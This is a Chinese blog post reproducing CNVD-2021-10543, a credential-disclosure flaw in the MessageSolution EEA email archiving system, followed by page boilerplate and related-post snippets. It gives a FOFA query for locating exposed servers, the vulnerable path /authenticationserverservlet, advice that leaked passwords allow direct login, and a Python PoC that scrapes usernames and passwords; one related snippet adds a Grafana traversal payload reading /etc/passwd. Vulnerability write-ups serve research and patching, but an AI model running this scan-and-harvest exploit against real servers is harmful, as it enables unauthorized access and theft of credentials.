MessageSolution企业邮件归档管理系统EEA信息泄露漏洞(cnvd-2021-10543)

最新推荐文章于 2023-12-10 14:19:44 发布
最新推荐文章于 2023-12-10 14:19:44 发布
阅读量722 收藏
点赞数 2
文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_42660246/article/details/116034365
版权

MessageSolution企业邮件归档管理系统EEA信息泄露漏洞(cnvd-2021-10543)

1.漏洞描述

MessageSolution企业邮件归档管理系统 / MessageSolution Enterprise Email Archiving (EEA) 是北京易讯思达科技开发有限公司开发的一款邮件归档系统。
该系统存在信息泄露漏洞,泄露用户名和密码。

2.复现过程

fofa:title=“MessageSolution Enterprise Email Archiving (EEA)”
在这里插入图片描述
payload:/authenticationserverservlet
浏览器访问https://IP/authenticationserverservlet
在这里插入图片描述

获取到账号和密码,可以直接用这个账号密码登录。
在这里插入图片描述

3.POC

import requests
import re


target = "http://IP"
url = target + "/authenticationserverservlet"
res = requests.get(url, verify=False)
regex1 = "<username>(.*?)</username>"
regex2 = "<password>(.*?)</password>"
match1 = re.findall(regex1, res.text)
match2 = re.findall(regex2, res.text)
if res.status_code == 200 and match1 and match2:
    print("success")
else:
    print("no vulnerability")

4.refer

https://mp.weixin.qq.com/s/_ieRHX-7nnnWMeflFcNEnQ

GreatBug333
关注
  • 2
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
MessageSolution 企业邮件归档管理系统 EEA 存在信息泄露漏洞CNVD-2021-10543
千寻的博客
04-08 906
漏洞描述 MessageSolution企业邮件归档管理系统 EEA是北京易讯思达科技开发有限公司开发的一款邮件归档系统。 该系统存在通用WEB信息泄漏,泄露Windows服务器administrator hash与web账号密码 公开日期:2021-03-07 影响版本 MessageSolution Enterprise Email Archiving (EEA) 漏洞查找 title=“MessageSolution Enterprise Email Archiving (EEA)” 漏
CNVD-2021-10543:CNVD-2021-10543MessageSolution企业邮件扩展管理系统EEA存在信息扩展漏洞
03-25
CNVD-2021-10543 CNVD-2021-10543MessageSolution企业邮件扩展管理系统EEA存在信息扩展漏洞 #使用python3 CNVD-2021-10543.py
MessageSolution 邮件归档系统EEA 信息泄露(CNVD-2021-10543)
MD@@nr丫卡uer
03-30 635
0x01 前言 MessageSolution企业电子邮件归档软件的开发商。MessageSolution企业邮件归档管理系统EEA存在信息泄露漏洞。 0x02 漏洞影响 攻击者可利用漏洞获取Windows服务器administrator hash与web账号密码等敏感信息。 0x03 fofa查询语句 title="MessageSolution Enterprise Email Archiving (EEA)" 0x04 漏洞复现 访问网站页面如图 payload http://ip/authe
MessageSolution 邮件归档系统EEA 信息泄露漏洞 CNVD-2021-10543复现
thelostworld
03-28 517
MessageSolution 邮件归档系统EEA 信息泄露漏洞CNVD-2021-10543复现 一、简介 MessageSolution企业邮件归档管理系统 EEA是北京易讯思达科技开发有限公司开发的一款邮件归档系统。该系统存在通用WEB信息泄漏,泄露Windows服务器administrator hash与web账号密码 二、影响产品 MessageSolution 企业邮件归档管理系统EEA 三、漏洞复现 访问页面: 存在漏洞poc路径: h...
基于MessageSolution 邮件归档系统EEA的通用型信息泄露漏洞挖洞
weixin_50464560的博客
03-26 562
前几天无意间看到这个通用型漏洞,编号是CNVD-2021-10543,想着也来试试。MessageSolution企业邮件归档管理系统 EEA是北京易讯思达科技开发有限公司开发的一款邮件归档系统。该系统存在通用WEB信息泄露漏洞,会泄露Windows服务器administrator hash与web账号密码 过程 1.fofa上使用搜索语法:title=“MessageSolution Enterprise Email Archiving (EEA)” 可以看到搜出了许多个ip,但是几乎没有域名。这里找了
CNVD-2021-10543MessageSolution 企业邮件归档管理系统 EEA 存在信息泄露漏洞.zip
最新发布
01-21
管理系统是一种通过计算机技术实现的用于组织、监控和控制各种活动的软件系统。这些系统通常被设计用来提高效率、减少错误、加强安全性,同时提供数据和信息支持。以下是一些常见类型的管理系统: 学校管理系统: ...
fengjixuchui#Vulnerability-1#MessageSolution 企业邮件归档管理系统任意文件上传(CN
07-25
MessageSolution 企业邮件归档管理系统任意文件上传(CNVD-2021-10543MessageSolution企业邮件归档管理系统EEA存在任
CVE-POC:CVE的一些POC
05-11
CVE-POC CNVD-2021-10543 MessageSolution 企业邮件归档管理系统 EEA 存在信息泄露漏洞 CVE-2020-1938 Apache Tomcat文件包含漏洞
2021年部分漏洞整合+检测工具
weixin_48421613的博客
12-15 3418
2021年已进入到尾声,出现的漏洞五花八门,令人眼花缭乱,其中确实有很多值得思考和学习,所以今天总结出9个比较有代表性、危害范围比较广泛的漏洞进行介绍,以及使用脚本进行检测 grafana任意文件读取漏洞 漏洞原理啥的就不再赘述,直接上测试过程以及脚本的检测方式,目前脚本检测仅支持单独检测 poc: /public/plugins/alertlist/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f../etc/passwd 页面原型: 漏洞
Servlet 身份验证体系结构
呜呼哈
04-05 299
SecurityContextHolder 在Spring Security的身份验证模型的核心是SecurityConextHolder。它包含SecurityContext。 SecurityContextHolder 是 Spring Security 存储被验证者的详细信息的地方。Spring Security 不关心 SecurityContextHolder 是如何填充的。如果它包含一个值,则将其用作当前经过身份验证的用户。 表明用户已通过身份验证的最简单方法是直接设置 SecurityCon
新版Spring Security6.2架构 (二) - Authentication
喝醉的鱼博客
12-10 1814
Spring Security 6.2新版本架构,翻译官网文档和个人理解
漏洞复现】锐捷RG-UAC统一上网行为管理审计系统信息泄露漏洞(CNVD-2021-14536)
Adminxe的博客
03-09 3549
0x00 前言 2021年3月8日,锐捷RG-UAC统一上网行为管理审计系统存在信息泄露漏洞,攻击者可以通过审查网页源代码获取到用户账号和密码,导致管理员用户认证信息泄露。 这个漏洞让我想到10年的审查元素大法,确实逻辑有点…… 0x01 影响范围 锐捷RG-UAC统一上网行为管理审计系统 FOFA互联网资产: title="RG-UAC登录页面" 0x02 漏洞复现 Ctrl+U打开网页源代码 通过访问一下路径,查看所包含的账户密码的(md5)形式 http://127..
专访MessageSolution:用归档为存储架构减压
weixin_34268753的博客
01-19 110
DoSTOR存储专访: "事实上,我们还没有输给过市场上人们为我们圈定的那些竞争对手。" 作为MessageSolution公司的产品总监,梁京伟相信,他的公司给了他一个绝好的机会,让他能够在进入中国的几年里获得极好的市场发展,因为在他看起来,"MessageSolution好像没有什么直接的竞争对手。"而且,对于文件归档以及更专业的邮件归档市场,梁京伟相信,这个市场的庞大,...
邮件归档体现数据价值
weixin_34082177的博客
10-11 124
MessageSolution应邀参加了2012年9月25日第二届中国计算机技术大会,与参会人员就电子邮件归档、存储、迁移、审计等多个问题进行了深入的交流。MessageSolution产品总监认为:在“大数据”时代来临之际,邮件归档、文件归档等专业归档产品能有效管理邮件、文件等非结构化数据,在遵从相关法规的同时提升企业信息处理效率,优化IT架构。参会人员对邮件归档...
最新MessageSolution归档技术
weixin_34413357的博客
11-04 140
MessageSolution,业界首家紧密支持Exchange 2013的归档厂家。作为邮件归档优秀的厂家,MessageSolution不断创新引领行业发展。微软今年推出的Exchange 2013获得大量企业级客户的亲睐。为更好地支持客户对邮件归档的需要,MessageSolution近期最新发布的归档产品紧密地集成Exchange 2013的最新开发接口,提供归档完整...
MessageSolution助新东方教育实现邮件归档 轻松应对法规要求(上)
weixin_33696822的博客
05-08 338
新东方教育科技集团(NYSE:EDU)由1993年成立的北京新东方学校发展壮大而来,目前集团以培训为核心,拥有新东方亲子中心、泡泡少儿教育、优能中学教育、基础英语培训、大学英语及考研培训、出国考试培训、多语种培训等多个培训体系,同时在基础教育、职业教育、教育研发、出国咨询、文化产业等方面取得了骄人的成绩。作为中国最大的著名私立教育机构,新东方教育科技集团于2006年在美国纽约...
MessageSolution:轻松邮件归档——《网络运维与管理》问答
weixin_34351321的博客
11-14 347
1)在目前云计算、大数据、移动互联的现状下,企业用户在信息化建设(安全、网络、IT运维、容灾备份、流量管理)中主要面临哪些问题和挑战?以邮件数据为例,数据量大很常见的情况有两种,一是:数据本身带有图表等大型文件;另一种是:群发文件使本身并不庞大的单个信息组合在一起,最后占据的空间令人吃惊。在此现状下,企业信息化建设所面临的问题主要就是两方面,一个是“存”,一个是“取”。“存”...
CAS集成Weblogic的ServletAuthentication调用
David.turing's Security Blog
04-02 210
本来,使用j_security_check是最简单的Build-in认证方式,但CAS有自己的登录入口,即login servlet,如果用该servlet,必须自己动手完成JAAS的登录。于是,开始扩展CAS的edu.yale.its.tp.cas.auth.provider,在该包中的provider都扩展自authHandler接口,而CAS是在web.xml中定义了最终使用哪一个authH...
java 过滤器鉴权_Servlet身份验证过滤器
weixin_32172693的博客
02-25 371
可以在过滤器中执行身份认证。 在这里,我们将如何在过滤器类检查由用户提交的密码,如果给定密码为admin,它将把请求转发到WelcomeAdmin servlet,否则会显示错误消息。使用过滤器验证用户的示例下面来看看如何使用过滤器验证用户的简单示例。在这个示例中创建了以下几个主要的代码文件:index.html - 首页MyFilter.java - 过滤器,用于处理用户登录信息和跳转。Admi...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值